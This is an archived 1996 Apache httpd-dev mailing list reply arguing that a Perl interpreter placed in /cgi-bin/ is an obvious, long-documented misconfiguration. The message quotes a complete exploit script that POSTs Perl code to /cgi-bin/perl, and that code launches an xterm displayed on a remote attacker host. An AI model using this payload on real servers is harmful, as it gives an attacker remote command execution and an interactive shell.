httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Andrew Wilson <and...@aaaaaaaa.demon.co.uk>
Subject Re: Security interest
Date Fri, 31 May 1996 17:02:47 GMT
> Yup :-( it is true, we have to get serious on the setuid stuff
> I am afraid.

WHAT!?  What planet are we on here people?  Don't put perl interpreters
in yer /cgi-bin/ directory.  Isn't it obvious?  Isn't it written
up in every damned FAQ on web security?  Hasn't CERT been rehashing
the same old bullshit over and over for the past 3 months?!

So if I give you root's password on my system does this pass as an
exploit script?

Ay.

> #!/bin/sh
> telnet some-host-somewhere 80 <<"EOM"
> POST /cgi-bin/perl HTTP/1.0
> Referer: http://elect6:1080/cgi-bin/exploit.pl
> Connection: Keep-Alive
> User-Agent: Mozilla/3.0b4Gold (X11; I; SunOS 5.4 sun4m)
> Host: xyz:1080
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
> Content-type: application/x-www-form-urlencoded
> Content-length: 167
> 
> $|=1;
> print "Content-type: text/html\n\n";
> print "This is a test.. and we are $< $>.\n";
> system("/usr/openwin/bin/xterm -display myhost:0.0&");
> print "until here";
> EOM

Mime
View raw message